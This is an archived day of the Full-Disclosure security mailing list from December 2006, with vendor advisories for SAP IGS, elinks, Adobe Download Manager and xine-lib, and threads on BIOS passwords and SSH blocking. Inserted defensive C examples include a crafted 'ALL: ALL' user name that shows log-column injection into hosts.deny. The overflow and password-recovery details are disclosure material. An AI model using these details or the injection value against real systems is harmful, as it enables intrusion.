[Full-disclosure] CYBSEC - Security Pre-Advisory: SAP Internet Graphics Service (IGS) Undocumented Features

2006-12-05 Thread Mariano Nuñez Di Croce
(The following pre-advisory is also available in PDF format for download at:
http://www.cybsec.com/vuln/CYBSEC-Security_Pre-Advisory_SAP_IGS_Undocumented_Features.pdf)


CYBSEC S.A.
www.cybsec.com

Pre-Advisory Name: SAP Internet Graphics Service (IGS) Undocumented Features
==

Vulnerability Class: Undocumented Features


Release Date: 12/05/2006
=

Affected Applications:
==
* SAP IGS 6.40 Patchlevel <= 15
* SAP IGS 7.00 Patchlevel <= 3


Affected Platforms:
===
* AIX 64 bits
* HP-UX on IA64 64bit
* HP-UX on PA-RISC 64bit
* Linux on IA32 32bit
* Linux on IA64 64bit
* Linux on Power 64bit
* Linux on x86_64 64bit
* Linux on zSeries 64bit
* OS/400 V5R2M0
* Solaris on SPARC 64bit
* TRU64 64bit
* Windows Server on IA32 32bit
* Windows Server on IA64 64bit
* Windows Server on x64 64bit

Local / Remote: Remote
===

Severity: Medium
=

Author:  Mariano Nuñez Di Croce
===

Vendor Status:
==
* Confirmed, update released.

Reference to Vulnerability Disclosure Policy:
=
http://www.cybsec.com/vulnerability_policy.pdf

Product Overview:
==
The IGS provides a server architecture where data from an SAP System or other 
sources can be used to generate graphical or non-graphical output.

It is important to note that IGS is installed and activated by default with the 
Web Application Server (versions >= 6.30).

Vulnerability Description:
==
Undocumented features have been discovered in SAP IGS service, some of which 
may signify security risks.

Technical Details:
==
Technical details will be released three months after publication of this 
pre-advisory. This was agreed upon with SAP to allow their customers to
upgrade affected software prior to technical knowledge being publicly available.

Impact:
===
Successful exploitation of this vulnerability allows an attacker to remotely 
shut down the SAP IGS service, access configuration files and perform
unauthorized actions over the service deployment.

Solutions:
==
SAP has released patches that disable the default-enabled access to the service's 
HTTP interface. Besides, some commands have been disabled. Affected
customers should apply the patches immediately.
More information can be found on SAP Notes 959358 and 965201.

Vendor Response:

* 06/02/2006: Initial Vendor Contact.
* 06/09/2006: Vendor Confirmed Vulnerability.
* 07/03/2006: Vendor Releases Update for version 6.40.
* 07/13/2006: Vendor Releases Update for version 7.00.
* 10/08/2006: Vendor Confirmed Solution.
* 12/05/2006: Pre-Advisory Public Disclosure.

Special Thanks:
===
Thanks go to Carlos Diaz and Victor Montero.

Contact Information:

For more information regarding the vulnerability feel free to contact the 
author at mnunez {at} cybsec.com. Please bear in mind that technical details
will be disclosed to the general public three
months after the release of this pre-advisory.


For more information regarding CYBSEC: www.cybsec.com
(c) 2006 - CYBSEC S.A. Security Systems

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 1228-1] New elinks packages fix arbitrary shell command execution

2006-12-05 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1228-1 [EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
December 5th, 2006  http://www.debian.org/security/faq
- --

Package: elinks
Vulnerability  : insufficient escaping
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-5925
Debian Bug : 399188

Teemu Salmela discovered that the elinks character mode web browser
performs insufficient sanitising of smb:// URIs, which might lead to the
execution of arbitrary shell commands.

For the stable distribution (sarge) this problem has been fixed in
version 0.10.4-7.1.

For the upcoming stable distribution (etch) this problem has been
fixed in version 0.11.1-1.2.

For the unstable distribution (sid) this problem has been fixed in
version 0.11.1-1.2.

We recommend that you upgrade your elinks package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:

http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1.dsc
  Size/MD5 checksum:  855 f57923819fa4fce0caca333fb49a08cb

http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1.diff.gz
  Size/MD5 checksum:25157 611bbe8d6abbdec32944915213b3ffea

http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4.orig.tar.gz
  Size/MD5 checksum:  3533243 d97d1755f9553a3f5c68a3fe420c6a7c

  Alpha architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_alpha.deb
  Size/MD5 checksum:  1439074 2db129d65122955bd31c6a62700f0843

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_alpha.deb
  Size/MD5 checksum:   764102 0654e01c0d5ee49ddb8d24e01d4bd220

  AMD64 architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_amd64.deb
  Size/MD5 checksum:  1364322 aa61b139f250715d1e9cb1725bfa7938

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_amd64.deb
  Size/MD5 checksum:   706090 18b9ebad31887943c0f54aebd0b355d6

  ARM architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_arm.deb
  Size/MD5 checksum:  1314146 21885ec226e0eef970c24d0bda2c087c

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_arm.deb
  Size/MD5 checksum:   664026 f7c2193f6a4a68a090aabafdb7297d1b

  HP Precision architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_hppa.deb
  Size/MD5 checksum:  1376592 3cda3866a1e2fcf13e702e789ed075df

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_hppa.deb
  Size/MD5 checksum:   714314 9e491abd147dc046a3702269d9cd0d1b

  Intel IA-32 architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_i386.deb
  Size/MD5 checksum:  1325060 0c438d6afad2fbd82f37fb2a92d2e109

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_i386.deb
  Size/MD5 checksum:   671640 d448bedeaefc0de24d256a862401da14

  Intel IA-64 architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_ia64.deb
  Size/MD5 checksum:  1536618 c68927923c69e4d51e35df3bbca94736

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_ia64.deb
  Size/MD5 checksum:   838730 9b10a09bb38f156ab2392774e123ca34

  Motorola 680x0 architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_m68k.deb
  Size/MD5 checksum:  1282356 ce4945f7b57906ee710bc0fb1fc23d04

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_m68k.deb
  Size/MD5 checksum:   639332 7e01f8968d3d7c3539164bcd5ddfe390

  Big endian MIPS architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_mips.deb
  Size/MD5 checksum:  1368274 72ad629b2802e1027517694a38c923e2

http://security.debian.org/pool/updates/main/e/elinks/elinks-lite_0.10.4-7.1_mips.deb
  Size/MD5 checksum:   711436 8fc708e7101e00c668ba06247f851012

  Little endian MIPS architecture:


http://security.debian.org/pool/updates/main/e/elinks/elinks_0.10.4-7.1_mipsel.deb
  Size/MD5 checksum:  1365494 

[Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi

2006-12-05 Thread richard cassidy
Flashing the bios on Acer Aspire 5102WLMi will erase all passwords
previously set.  This is obviously a bug!  All passwords should not be
wiped out with a bios flash (or at least they weren't on a Dell).  Or,
if they are, it should be stated up front so the passwords can be set
again once the bios is updated.

https://www.synapsenow.com/synapse/data/7117/documents/AS31-51-5110_Flash_v200.zip

If you forget the bios password, they require the computer to be
mailed to them; then they charge $100USD (citing labor & security).
The work around they don't tell you about is to download the bios
flasher and update your bios.

I tried contacting Acer about this bug and could not reach (was not
transferred) the proper people; I've had teeth pulled that went better
than trying to inform Acer.



Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi

2006-12-05 Thread Tyop?
On 12/5/06, richard cassidy [EMAIL PROTECTED] wrote:
 Flashing the bios on Acer Aspire 5102WLMi will erase all passwords
 previously set.  This is obviously a bug!  All passwords should not be
 wiped out with a bios flash (or at least they weren't on a Dell).  Or,
 if they are, it should be stated up front so the passwords can be set
 again once the bios is updated.

Flashing the bios will erase all data.
It's a feature, not a bug.

-- 
Tyop?



Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi

2006-12-05 Thread Valdis . Kletnieks
On Tue, 05 Dec 2006 22:37:36 +0100, Tyop? said:
 On 12/5/06, richard cassidy [EMAIL PROTECTED] wrote:
  Flashing the bios on Acer Aspire 5102WLMi will erase all passwords
  previously set.  This is obviously a bug!  All passwords should not be
  wiped out with a bios flash (or at least they weren't on a Dell).  Or,
  if they are, it should be stated up front so the passwords can be set
  again once the bios is updated.
 
 Flashing the bios will erase all data.

So the big question becomes - on an Acer, are the passwords stored in the
BIOS flash memory (in which case, having them evaporate on a BIOS flash is
reasonable), or are they on the NVRAM chip, in which case it's a bug/misfeature?



Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi

2006-12-05 Thread endrazine
Tyop? wrote:
 Flashing the bios will erase all data.
 It's a feature, not a bug.

   
BIOS passwords are stored in the CMOS, not the ROM itself, so no, it 
doesn't have to be.
On the other side, if you can flash your ROM, you have iopl(3) hence 
root privileges or at least enough privileges to get those passwords
back (1). So that's really no big deal.

Regards,

endrazine-


(1) 
http://packetstorm.linuxsecurity.com/papers/password/Bios.Information.Leakage.txt


side note: I think you both know nothing. Sadly, giving non technical 
_opinions_ has become
the main source of postings on this list.



Re: [Full-disclosure] BIOS Flash erases all prior passwords on Acer Aspire 5102WLMi

2006-12-05 Thread endrazine
endrazine wrote:
Just so you know: most BIOS settings are stored in the CMOS, so if you
can flash the ROM, you have ioperms at the very least on the CMOS I/O
ports, so you can reset the whole CMOS anyway.


endrazine-



[Full-disclosure] EEYE: Adobe Download Manager AOM Stack Buffer Overflow Vulnerability

2006-12-05 Thread eEye Advisories
eEye Research - http://research.eeye.com

Adobe Download Manager AOM Stack Buffer Overflow Vulnerability

Release Date:
December 5, 2006

Date Reported:
November 10, 2006

Severity:
High (Code Execution)

Systems Affected:
Adobe Download Manager 2.1.x and earlier

Overview:
eEye Digital Security has discovered a stack buffer overflow in Adobe
Download Manager, a utility typically installed for the purpose of
downloading Adobe software such as Adobe (Acrobat) Reader.  By opening a
malicious AOM file, a user's system may be compromised by arbitrary code
within the file, which executes with the privileges of that user.

A web-based attack conducted through Internet Explorer may succeed
without the use of ActiveX or scripting, and without any additional user
interaction other than viewing a web page, if the web server indicates a
Content-Type of application/aom when serving up the malicious AOM
file.  In such a case, an .aom file extension is not required.

Technical Details:
AdobeDownloadManager.exe is responsible for extracting download
instructions from AOM files, which are essentially XML with an appended
CRC32 in decimal, and committing the instructions to the file
%APPDATA%\dm.ini for later processing.  For instance, opening the
following AOM file:

<?aom encoding="UTF-8"?>
<AdobeDownloadManager>
<AOM>
<DownloadRecord>
<url>WelcomeToMyHumbleAdobe</url>
</DownloadRecord>
</AOM>
</AdobeDownloadManager>3871966612

will generate the following lines in dm.ini:

[STARTUP]
Status=IncompleteDownload
[WelcomeToMyHumbleAdobe]
StoreID=0
TransactionID=0

When launched, whether or not it is supplied with an AOM file,
AdobeDownloadManager.exe reads the entries from dm.ini and handles
each described download according to its properties.  It begins by
reading a list of section names into a 400h-byte buffer using
GetPrivateProfileStringA, then copies each section name into a 108h-byte
stack buffer using strncpy with a length limit equal to the length of
the section name string.  The result is a relatively straightforward
stack buffer overflow, with the only complication being the character
restrictions.

It should be possible to uninstall Adobe Download Manager, or at least
unassociate the AOM file extension and application/aom Content-Type in
the registry, to defend against this vulnerability.  Hopefully users who
have been forced to install Adobe Download Manager realized its
superfluousness and have already uninstalled it.

Protection:
Retina - Network Security Scanner has been updated to identify this
vulnerability.
Blink - Unified Client Security has proactively protected from this
vulnerability since its discovery.

Vendor Status:
Adobe has released a patch for this vulnerability which is available at
http://www.adobe.com/products/acrobat/acrrmanager.html.  
The vendor bulletin is available at:
http://www.adobe.com/support/security/bulletins/apsb06-19.html.

Credit:
Derek Soeder

Related Links:
Retina - Network Security Scanner - Free Trial:
http://www.eeye.com/html/products/retina/download/index.html
Blink - Unified Client Security Personal - Free For Home Use:
http://www.eeye.com/html/products/blink/personal/download/index.html
Blink - Unified Client Security Professional - Free Trial:
http://www.eeye.com/html/products/blink/download/index.html

Greetings:
Spooky action at a distance.  Whoever else found that kernel race
condition.  Runner-up: Automatically Downloads Malware.  (Thanks
Daniel!)

Copyright (c) 1998-2006 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically.  It is not to be edited in any way without express
consent of eEye.  If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice.  Use of
this information constitutes acceptance for use in an AS IS condition.
There are no warranties, implied or express, with regard to this
information.  In no event shall the author be liable for any direct or
indirect damages whatsoever arising out of or in connection with the use
or spread of this information.  Any use of this information is at the
user's own risk.

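The two mechanisms the technical details above describe, as an added example that is not eEye's or Adobe's code: a check of the AOM layout (XML body followed by a CRC32 written in decimal) and a bounded section-name copy of the kind the dm.ini reader should have used instead of `strncpy` with a limit equal to the source length. Assumptions, also marked in the comments: the trailer is a standard zlib/IEEE CRC-32 (the advisory does not name a variant), the XML body ends in `>` as the advisory's sample does, the 0x400 and 0x108 sizes are the ones the advisory names, and `name_of_length_fits` is a demo helper, not anything in the real reader.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Sizes the advisory names: the section-name list is read into a 0x400-byte
 * buffer and each name is copied into a 0x108-byte stack buffer. */
#define SECTION_LIST_BUF 0x400
#define SECTION_NAME_BUF 0x108

/* Bitwise CRC-32, zlib/IEEE polynomial. Assumption: this is the "CRC32 in
 * decimal" the advisory describes; it does not name a variant. */
uint32_t crc32_ieee(const unsigned char *p, size_t n)
{
    uint32_t c = 0xFFFFFFFFu;
    for (size_t i = 0; i < n; i++) {
        c ^= p[i];
        for (int k = 0; k < 8; k++)
            c = (c >> 1) ^ (0xEDB88320u & (0u - (c & 1u)));
    }
    return c ^ 0xFFFFFFFFu;
}

/* Split an AOM buffer into XML body + trailing decimal CRC and verify it.
 * Assumes the body ends in '>' (as the advisory's sample does), so the
 * trailing run of digits is exactly the CRC. Returns the body length, or
 * -1 for a missing/overlong trailer or a CRC mismatch. */
long aom_verify(const char *buf, size_t len)
{
    size_t end = len;
    while (end > 0 && buf[end - 1] >= '0' && buf[end - 1] <= '9')
        end--;
    size_t digits = len - end;
    if (end == 0 || digits == 0 || digits > 10)
        return -1;
    char tmp[11];
    memcpy(tmp, buf + end, digits);
    tmp[digits] = '\0';
    unsigned long long stated = strtoull(tmp, NULL, 10);
    if (stated > 0xFFFFFFFFull)
        return -1;
    uint32_t actual = crc32_ieee((const unsigned char *)buf, end);
    return (uint32_t)stated == actual ? (long)end : -1;
}

/* Append the decimal CRC to an XML body; used only to build the constructed
 * sample. Returns the total length, or 0 if out is too small. */
size_t aom_build(const char *xml, char *out, size_t outsz)
{
    uint32_t crc = crc32_ieee((const unsigned char *)xml, strlen(xml));
    int w = snprintf(out, outsz, "%s%lu", xml, (unsigned long)crc);
    return (w > 0 && (size_t)w < outsz) ? (size_t)w : 0;
}

/* The advisory's bug, in outline:
 *     strncpy(stack_buf, name, strlen(name));   // stack_buf is 0x108 bytes
 * The limit equals the source length, so it limits nothing. The safe form
 * measures against the destination size and rejects what does not fit. */
int copy_section_name(char dst[SECTION_NAME_BUF], const char *name)
{
    size_t n = 0;
    while (n < SECTION_NAME_BUF && name[n] != '\0')
        n++;
    if (n >= SECTION_NAME_BUF)
        return -1;                     /* no room for the name and its NUL */
    memcpy(dst, name, n);
    dst[n] = '\0';
    return (int)n;
}

/* Demo helper (not part of any real reader): would a section name of
 * `len` 'A's be accepted? 1 = accepted, 0 = rejected. */
int name_of_length_fits(size_t len)
{
    static char name[SECTION_LIST_BUF];
    char dst[SECTION_NAME_BUF];
    if (len >= sizeof name)
        return 0;
    memset(name, 'A', len);
    name[len] = '\0';
    return copy_section_name(dst, name) >= 0;
}

int main(void)
{
    char aom[128];
    size_t n = aom_build("<AOM><url>x</url></AOM>", aom, sizeof aom);
    printf("body length %ld (CRC ok)\n", aom_verify(aom, n));        /* 23 */
    aom[n - 1] ^= 1;                                                  /* corrupt the trailer */
    printf("after corruption: %ld\n", aom_verify(aom, n));           /* -1 */
    printf("0x107-byte name fits: %d, 0x108-byte name fits: %d\n",
           name_of_length_fits(0x107), name_of_length_fits(0x108));  /* 1, 0 */
    return 0;
}
```

The point of `copy_section_name` is that the bound comes from the destination, so a 0x107-byte name (which still leaves room for the terminator) is the longest accepted; the CRC check is the cheap integrity test that a reader of this format should perform before acting on any of the XML.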


[Full-disclosure] [ MDKSA-2006:224 ] - Updated xine-lib packages fix buffer overflow vulnerability

2006-12-05 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:224
 http://www.mandriva.com/security/
 ___
 
 Package : xine-lib
 Date: December 5, 2006
 Affected: 2007.0, Corporate 3.0
 ___
 
 Problem Description:
 
 Buffer overflow in the asmrp_eval function for the Real Media input
 plugin allows remote attackers to cause a denial of service and
 possibly execute arbitrary code via a rulebook with a large number of
 rulematches.

 Updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6172
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 b0aa36d10d1ee53184b345c4a48b6fcb  
2007.0/i586/libxine1-1.1.2-3.2mdv2007.0.i586.rpm
 0c67ca2d47ea5594d2978573205c158f  
2007.0/i586/libxine1-devel-1.1.2-3.2mdv2007.0.i586.rpm
 ee79849493b4b40f207e0e135dc9f4ca  
2007.0/i586/xine-aa-1.1.2-3.2mdv2007.0.i586.rpm
 f0d942949cf3938287e3f4ec44275807  
2007.0/i586/xine-arts-1.1.2-3.2mdv2007.0.i586.rpm
 db80c09dc6050a920aeae2e410ab4471  
2007.0/i586/xine-dxr3-1.1.2-3.2mdv2007.0.i586.rpm
 79f07b0afcbf4682752919829bde6fcf  
2007.0/i586/xine-esd-1.1.2-3.2mdv2007.0.i586.rpm
 51688356ab263c95b051712ed0f70def  
2007.0/i586/xine-flac-1.1.2-3.2mdv2007.0.i586.rpm
 74cd9a178d86754b337e4b1217874863  
2007.0/i586/xine-gnomevfs-1.1.2-3.2mdv2007.0.i586.rpm
 3f331ce5c5463512038ad69a785c9dbe  
2007.0/i586/xine-image-1.1.2-3.2mdv2007.0.i586.rpm
 f147438cd7f07aaf70e1178bd2343133  
2007.0/i586/xine-plugins-1.1.2-3.2mdv2007.0.i586.rpm
 7cb84dbcf336d715b04812fbedb349cf  
2007.0/i586/xine-sdl-1.1.2-3.2mdv2007.0.i586.rpm
 860fe1ca635d076e9bfa1819e7b603cd  
2007.0/i586/xine-smb-1.1.2-3.2mdv2007.0.i586.rpm 
 c7a995ee090abd62b6a580b53e3c3364  
2007.0/SRPMS/xine-lib-1.1.2-3.2mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 a1a3e704ff2f356784ad084f95d41f74  
2007.0/x86_64/lib64xine1-1.1.2-3.2mdv2007.0.x86_64.rpm
 ee81c8526e7baf295f214338fa3d45cd  
2007.0/x86_64/lib64xine1-devel-1.1.2-3.2mdv2007.0.x86_64.rpm
 bdb0a918df1d9239016741bde0027f3a  
2007.0/x86_64/xine-aa-1.1.2-3.2mdv2007.0.x86_64.rpm
 6cc4cc4b46b3dbeb22364ecc15d9c7d6  
2007.0/x86_64/xine-arts-1.1.2-3.2mdv2007.0.x86_64.rpm
 4d9ce5c5ef2814e2c18dcc60e6270322  
2007.0/x86_64/xine-dxr3-1.1.2-3.2mdv2007.0.x86_64.rpm
 38fe8e37988df8307028778421029349  
2007.0/x86_64/xine-esd-1.1.2-3.2mdv2007.0.x86_64.rpm
 53ccedaeef04ff9b15bcf3d63cdb8663  
2007.0/x86_64/xine-flac-1.1.2-3.2mdv2007.0.x86_64.rpm
 b090fb7ac33b25d310dc8cfc4758062b  
2007.0/x86_64/xine-gnomevfs-1.1.2-3.2mdv2007.0.x86_64.rpm
 51d280def3f6c87276e9b4892c807d38  
2007.0/x86_64/xine-image-1.1.2-3.2mdv2007.0.x86_64.rpm
 fdbfa62329ac6fadba0277db33b71cff  
2007.0/x86_64/xine-plugins-1.1.2-3.2mdv2007.0.x86_64.rpm
 af8dda72b12c9a36d7a51d3d5916bb38  
2007.0/x86_64/xine-sdl-1.1.2-3.2mdv2007.0.x86_64.rpm
 dea73578f285ebe1b1aac769cc0a549a  
2007.0/x86_64/xine-smb-1.1.2-3.2mdv2007.0.x86_64.rpm 
 c7a995ee090abd62b6a580b53e3c3364  
2007.0/SRPMS/xine-lib-1.1.2-3.2mdv2007.0.src.rpm

 Corporate 3.0:
 e27a1f3f0a92a65ea9673d0aa7bd9660  
corporate/3.0/i586/libxine1-1-0.rc3.6.14.C30mdk.i586.rpm
 cef9a906baabe8c8e18bbe45762268fd  
corporate/3.0/i586/libxine1-devel-1-0.rc3.6.14.C30mdk.i586.rpm
 5260c623ea029663a3166c8e350b6306  
corporate/3.0/i586/xine-aa-1-0.rc3.6.14.C30mdk.i586.rpm
 aa8ed9640d1e42608f1cd531d4d00dd6  
corporate/3.0/i586/xine-arts-1-0.rc3.6.14.C30mdk.i586.rpm
 1d311b51dc2ea55a1590ef409bfd9d9f  
corporate/3.0/i586/xine-dxr3-1-0.rc3.6.14.C30mdk.i586.rpm
 d8602b10e1b5b0ea29959c981bf5866e  
corporate/3.0/i586/xine-esd-1-0.rc3.6.14.C30mdk.i586.rpm
 ba65fc2fa69c85b848f7fe5728381003  
corporate/3.0/i586/xine-flac-1-0.rc3.6.14.C30mdk.i586.rpm
 bbf13c446ebf132b6a474a9bf4a300cd  
corporate/3.0/i586/xine-gnomevfs-1-0.rc3.6.14.C30mdk.i586.rpm
 18168e188258d645ba33103a743af3cb  
corporate/3.0/i586/xine-plugins-1-0.rc3.6.14.C30mdk.i586.rpm 
 11ff55c81b52559ff1b08bab917d63db  
corporate/3.0/SRPMS/xine-lib-1-0.rc3.6.14.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 fad4ae51ebdd06fe3b3f7848994bc7f0  
corporate/3.0/x86_64/lib64xine1-1-0.rc3.6.14.C30mdk.x86_64.rpm
 0aeb5bb0a613d0fa13788c7f2c64c871  
corporate/3.0/x86_64/lib64xine1-devel-1-0.rc3.6.14.C30mdk.x86_64.rpm
 755ab190b656fdbb9313189cce7f5a80  
corporate/3.0/x86_64/xine-aa-1-0.rc3.6.14.C30mdk.x86_64.rpm
 ecf0b4ee0c12d1506432c297080bbb67  
corporate/3.0/x86_64/xine-arts-1-0.rc3.6.14.C30mdk.x86_64.rpm
 8433359eaa5ec8987efe65e6ada96132  
corporate/3.0/x86_64/xine-esd-1-0.rc3.6.14.C30mdk.x86_64.rpm
 bbb1ac4807f1e8a7960d8704c79c6134  
corporate/3.0/x86_64/xine-flac-1-0.rc3.6.14.C30mdk.x86_64.rpm
 356f64f53ce7d552acc239cde30b60ea  

Re: [Full-disclosure] Nmap Online

2006-12-05 Thread Simon Smith
Why would you do this?


On 11/28/06 3:19 AM, David Matousek [EMAIL PROTECTED] wrote:

 Hello,
 
 For all Nmap fans, our group has implemented the Nmap Online service.
 Its address is http://nmap-online.com/. The interface allows you to perform
 custom Nmap scans from our server with only a few limitations in the syntax.
 The service is free and can be used immediately; no registration is required.
 
 Please direct your questions and suggestions to our emails.
 
 
 Regards,




Re: [Full-disclosure] SSH brute force blocking tool

2006-12-05 Thread Simon Smith
You have experience in disarming land mines with a hammer while you are
stark naked? 

Now that's a real man's job!


On 11/27/06 4:20 PM, Brian Eaton [EMAIL PROTECTED] wrote:

 On 11/27/06, J. Oquendo [EMAIL PROTECTED] wrote:
 There is no hocus pocus here. Look at /var/log/secure and find the term
 "error retrieving" and print the next line, 13th column. Then sort it and
 print the unique entries into /tmp/hosts.deny. After you do this, compare
 /tmp/hosts.deny with /etc/hosts.deny and put the differences not in
 /etc/hosts.deny into /etc/hosts.deny
 
 Parsing malicious input with shell commands is like disarming land mines with
 a hammer. 
 
 And doing it as root?  That's like disarming land mines with a hammer while
 you're stark naked.
 
 Regards,
 Brian
  
 
 
 
 


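Brian's objection in the exchange above is about trusting whatever sits in the 13th column of a log line. As an added example (not J. Oquendo's tool, nor anything posted in this thread), here is the same pipeline done as an unprivileged step that only accepts tokens that parse as IP literals, so a user name that shifts the columns produces a rejected token rather than a hosts.deny entry. The sample log lines are constructed for the example, in a syslog layout where the client address is the 13th whitespace-separated field of the "Failed password" line following "error retrieving"; the existing hosts.deny contents are likewise constructed, and appending the result to /etc/hosts.deny is left to a separate privileged step.

```c
#include <arpa/inet.h>
#include <stdio.h>
#include <string.h>

#define MAX_HOSTS 64
#define TOKEN_MAX 64

/* Constructed sample of /var/log/secure lines (not real log data). In this
 * layout the client address is the 13th whitespace-separated field of the
 * "Failed password" line that follows "error retrieving". The second pair
 * has a user name containing a space, which shifts the columns by one. */
static const char *SAMPLE_SECURE_LOG[] = {
    "Dec  5 22:37:36 host sshd[1234]: error retrieving information about user admin",
    "Dec  5 22:37:36 host sshd[1234]: Failed password for invalid user admin from 10.0.0.5 port 4444 ssh2",
    "Dec  5 22:38:01 host sshd[1240]: error retrieving information about user ALL: ALL",
    "Dec  5 22:38:01 host sshd[1240]: Failed password for invalid user ALL: ALL from 10.0.0.6 port 4445 ssh2",
    "Dec  5 22:39:10 host sshd[1251]: error retrieving information about user oracle",
    "Dec  5 22:39:10 host sshd[1251]: Failed password for invalid user oracle from 10.0.0.7 port 4446 ssh2",
    "Dec  5 22:39:12 host sshd[1251]: Failed password for invalid user oracle from 10.0.0.7 port 4447 ssh2",
};
static const size_t SAMPLE_LINES = sizeof SAMPLE_SECURE_LOG / sizeof *SAMPLE_SECURE_LOG;

/* Copy whitespace-separated column `col` (1-based) of line into out.
 * Returns 1 on success, 0 if the line is shorter or the token too long. */
static int column(const char *line, int col, char *out, size_t outsz)
{
    const char *p = line;
    for (int i = 1;; i++) {
        p += strspn(p, " \t");
        if (*p == '\0')
            return 0;
        size_t n = strcspn(p, " \t");
        if (i == col) {
            if (n >= outsz)
                return 0;
            memcpy(out, p, n);
            out[n] = '\0';
            return 1;
        }
        p += n;
    }
}

/* Accept only tokens that parse as an IPv4 or IPv6 literal. */
int is_ip_literal(const char *s)
{
    unsigned char tmp[16];
    return inet_pton(AF_INET, s, tmp) == 1 || inet_pton(AF_INET6, s, tmp) == 1;
}

/* The pipeline described in the thread, minus the shell: after each line
 * containing "error retrieving", take column 13 of the next line. A token
 * reaches the result only if it is an IP literal; anything else (here
 * "from", because the spaced user name shifted the columns) is counted in
 * *rejected instead. Results are de-duplicated, in first-seen order. */
int collect_offenders(const char **lines, size_t nlines, char out[][TOKEN_MAX],
                      int max, int *rejected)
{
    int count = 0;
    *rejected = 0;
    for (size_t i = 0; i + 1 < nlines; i++) {
        char tok[TOKEN_MAX];
        if (strstr(lines[i], "error retrieving") == NULL)
            continue;
        if (!column(lines[i + 1], 13, tok, sizeof tok) || !is_ip_literal(tok)) {
            (*rejected)++;
            continue;
        }
        int dup = 0;
        for (int j = 0; j < count; j++)
            if (strcmp(out[j], tok) == 0)
                dup = 1;
        if (!dup && count < max)
            strcpy(out[count++], tok);
    }
    return count;
}

/* Compare against clients already in hosts.deny (given as bare addresses,
 * e.g. the "10.0.0.7" of "sshd: 10.0.0.7"). Copies the offenders that are
 * not yet listed to out and returns how many; only those need the
 * privileged append to /etc/hosts.deny. */
int new_entries(char offenders[][TOKEN_MAX], int n, const char **denied,
                size_t ndenied, char out[][TOKEN_MAX], int max)
{
    int m = 0;
    for (int i = 0; i < n && m < max; i++) {
        int seen = 0;
        for (size_t j = 0; j < ndenied; j++)
            if (strcmp(offenders[i], denied[j]) == 0)
                seen = 1;
        if (!seen)
            strcpy(out[m++], offenders[i]);
    }
    return m;
}

int main(void)
{
    char hosts[MAX_HOSTS][TOKEN_MAX], fresh[MAX_HOSTS][TOKEN_MAX];
    const char *already_denied[] = { "10.0.0.7" };     /* constructed existing hosts.deny */
    int rejected = 0;
    int n = collect_offenders(SAMPLE_SECURE_LOG, SAMPLE_LINES, hosts, MAX_HOSTS, &rejected);
    int m = new_entries(hosts, n, already_denied, 1, fresh, MAX_HOSTS);
    printf("offenders=%d rejected=%d new=%d\n", n, rejected, m);
    for (int i = 0; i < m; i++)
        printf("sshd: %s\n", fresh[i]);                 /* lines a privileged step would append */
    return 0;
}
```

The validation step is what separates this from the shell pipeline: `inet_pton` either yields an address or it does not, so nothing that is not an address can be written into an access-control file, whatever the log line was made to look like.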

Re: [Full-disclosure] Nmap Online

2006-12-05 Thread Ed Carp
On 12/5/06, Simon Smith [EMAIL PROTECTED] wrote:

 Why would you do this?

Well, for one, sometimes you need to do a port scan when you're not in
front of a system that has nmap installed on it.  I get a call about
once every couple of months, why can't I get into my email server
that's sitting behind a hardware router with a hole poked in it for
port 110.  Doing a port scan on the client's IP address ensures that
either yes, the port is open or no, it's not.  If it's open then I can
proceed with my troubleshooting - if not, I know where to look for the
problem.



[Full-disclosure] [USN-390-2] evince vulnerability

2006-12-05 Thread Kees Cook
=== 
Ubuntu Security Notice USN-390-2  December 06, 2006
evince vulnerability
